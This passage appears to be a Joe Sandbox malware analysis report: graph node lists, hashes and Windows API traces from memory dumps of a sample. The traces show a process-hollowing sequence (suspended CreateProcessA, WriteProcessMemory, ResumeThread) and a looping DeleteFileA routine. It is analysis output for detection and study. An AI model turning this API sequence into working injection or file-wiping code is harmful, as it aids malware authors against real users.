5515->5516 5517 2380a12 GetThreadContext 5515->5517 5516->5511 5560 2380b17 5516->5560 5517->5516 5518 2380a3a VirtualProtectEx 5517->5518 5518->5516 5520 2380a65 DuplicateHandle 5518->5520 5520->5516 5521 2380aa6 WriteProcessMemory 5520->5521 5521->5516 5522 2380ad4 ResumeThread 5521->5522 5523 2380ae5 Sleep OpenMutexA 5522->5523 5523->5511 5524 2380b0b 5523->5524 5524->5516 5524->5523 5526 23806a5 5525->5526 5527 23806e6 3 API calls 5526->5527 5529 23806dd 5527->5529 5528 2380833 5528->5495 5529->5528 5530 2380835 3 API calls 5529->5530 5530->5528 5533 23806eb 5531->5533 5532 2380833 5532->5500 5533->5532 5534 2380835 3 API calls 5533->5534 5534->5532 5536 2380864 5535->5536 5537 2380887 5536->5537 5538 23808fd 3 API calls 5536->5538 5539 238088a 5536->5539 5537->5539 5540 2380ce8 GetPEB 5537->5540 5538->5537 5539->5499 5542 2380909 5540->5542 5541 2380962 3 API calls 5541->5542 5542->5541 5544 2380c6f 5543->5544 5544->5504 5544->5544 5546 238342b 5545->5546 5546->5508 5562 2383677 5547->5562 5549 2380a02 CreateProcessA 5550 2380b10 5549->5550 5551 2380a12 GetThreadContext 5549->5551 5553 2380b15 5550->5553 5554 2380b17 6 API calls 5550->5554 5551->5550 5552 2380a3a VirtualProtectEx 5551->5552 5552->5550 5555 2380a65 DuplicateHandle 5552->5555 5553->5514 5554->5553 5555->5550 5556 2380aa6 WriteProcessMemory 5555->5556 5556->5550 5557 2380ad4 ResumeThread 5556->5557 5558 2380ae5 Sleep OpenMutexA 5557->5558 5558->5553 5559 2380b0b 5558->5559 5559->5550 5559->5558 5564 2380b25 5560->5564 5563 2383689 5562->5563 5563->5549 5563->5563 5565 2380ce8 GetPEB 5564->5565 5566 2380b31 5565->5566 5571 2380b4b 5566->5571 5568 2380b44 5577 2380b89 5568->5577 5572 2383677 5571->5572 5573 2380b50 LoadLibraryA 5572->5573 5574 2380b66 5573->5574 5575 2380b89 5 API calls 5574->5575 5576 2380b7b 5574->5576 5575->5576 5576->5568 5578 2380b8e 5577->5578 5579 2380bd0 5578->5579 5581 2380ba1 OpenProcess 5578->5581 5587 23808d7 5579->5587 5581->5579 5584 2380bb2 5581->5584 5584->5579 5585 
2380bc8 ExitProcess 5584->5585 5588 23808dd 5587->5588 5594 23808fd 5588->5594 5595 2380ce8 GetPEB 5594->5595 5597 2380909 5595->5597 5598 2380962 5597->5598 5599 2380ce8 GetPEB 5598->5599 5600 238096e 5599->5600 5601 2380978 Sleep RtlExitUserThread 5600->5601 5755 1c4d25 5756 1c4d4e 5755->5756 5757 1c4d32 5755->5757 5757->5756 5758 1c4d44 SetEvent 5757->5758 5758->5756
APIs
  • Part of subcall function 0238098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023809A5
  • Part of subcall function 0238098B: GetStartupInfoA.KERNEL32(00000000), ref: 023809BD
• ExitProcess.KERNEL32(00000000), ref: 0238001D
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
• Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction ID: a287faa4fa95e8a3f5c84f8dc856e66b27c84a1475dcc4910eb629901050568f
• Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction Fuzzy Hash: 0C7202A145E3C05FD72FBB604A65A657FB9AF03208B1A10CBD4C1DF0B3D6649A0DC76A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1812098720.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_850000_bin.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
• API String ID: 544645111-3459585926
• Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction ID: a83a67dc5248ec11a752d4e3d9235a2fc5cf258d1871ba1ffd0080b1d3c1f827
• Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction Fuzzy Hash: 363277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 001C0959
• RtlExitUserThread.NTDLL(00000000), ref: 001C0961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
• GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
• String ID:
• API String ID: 1099281029-0
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
• Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
• Sleep.KERNEL32(000007D0), ref: 001C3F5B
• Sleep.KERNEL32(00000BB8), ref: 001C3F6B
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          (rendered graph figure not reproduced; single basic block 2383409-2383462 with GetVolumeInformationA and call 2383634, legend: Executed / Not Executed)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02383405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02383409
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction ID: ca6f0edebffd9bb2924a5450e1d8a21222bf92ee10a23942faead219f6babb9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C8AA4DBF206CA30A599CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(02382949,00000008,?,00000000,02382835,00000000), ref: 02382956
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02382993
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829C1), ref: 023829D0
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 3f42b6f8231ee44447f82dbdfb2a56677ce5942c08541a50f89f840f7a315c1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C515171501394AEEB237F708D48FAB77BDEF40705F4404A6AE85EE051EE349680CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          (rendered graph figure not reproduced; basic blocks 1c292d-1c2b48, legend: Executed / Not Executed; the API calls reached are listed under APIs below)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          (rendered graph figure not reproduced; basic blocks 23809fd-2380b16, legend: Executed / Not Executed; the API calls reached are listed under APIs below)
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,023809F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02380A04
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02380A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02380A57
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02385834,00000000,00000000,00000002), ref: 02380A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02380ACA
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02380ADA
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02380AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02380B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: 653c7ca59492c808b9af08f9304fd86b8880f0c1d8734a2a6221dbde066ea1a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A314F316402189FEF279F20CC85BA977B8BF04748F0805D4AA49FE1E5DBB0D694CE64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          (rendered graph figure not reproduced; basic blocks 1c09d9-1c0af2, legend: Executed / Not Executed; the API calls reached are listed under APIs below)
APIs
• CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
• GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
• ResumeThread.KERNEL32(?), ref: 001C0AB6
• Sleep.KERNEL32(000003E8), ref: 001C0AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
• String ID:
• API String ID: 617592159-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• lstrcat.KERNEL32(00000000,023829C1), ref: 023829D0
  • Part of subcall function 02382A01: lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
  • Part of subcall function 02382A01: lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
  • Part of subcall function 02382A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
  • Part of subcall function 02382A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (blocks 1c29a6-1c2b48): three lstrcat calls (1c29a6-1c2a1a), then a loop headed at 1c2a48 whose body calls 1c2683 three times, each followed by a conditional DeleteFileA (1c2a8a, 1c2ace, 1c2b1e), a Sleep at 1c2b34, and a branch back to the loop head.
APIs
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (blocks 2382a01-2382b6c): two lstrcat calls (2382a01-2382a3e), then a loop headed at 2382a6c whose body calls 23826a7 three times, each followed by a conditional DeleteFileA (2382aae, 2382af2, 2382b42), a Sleep at 2382b58, and a branch back to the loop head.
APIs
• lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
  • Part of subcall function 02382A38: lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
  • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
  • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
  • Part of subcall function 02382A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
  • Part of subcall function 02382A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph (blocks 1c29dd-1c2b48): two lstrcat calls (1c29dd-1c2a1a), then a loop headed at 1c2a48 whose body calls 1c2683 three times, each followed by a conditional DeleteFileA (1c2a8a, 1c2ace, 1c2b1e), a Sleep at 1c2b34, and a branch back to the loop head.
APIs
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
  • Part of subcall function 02382B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02382C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: fe263bc7a84a6d6a594af912e0c7f71bf844388ecdf61baf805f1d3ca3a95e6e
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: 7E312171501398AEDB227F708D48FAF76BCEF40709F4044A5AE45EE054EF349680CEA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 0238320E
• GetStartupInfoA.KERNEL32(00000000), ref: 0238324C
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023831D9,00000011,?,00000000,00000000), ref: 02383279
• CloseHandle.KERNEL32(?,?,023831D9,00000011,?,00000000,00000000,00000000,02383092,00000004,00000000), ref: 02383285
• CloseHandle.KERNEL32(?,?,023831D9,00000011,?,00000000,00000000,00000000,02383092,00000004,00000000), ref: 02383291
Memory Dump Source
• Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2380000_bin.jbxd
Similarity
• API ID: CloseHandle$CreateInfoProcessStartuplstrcat
• String ID:
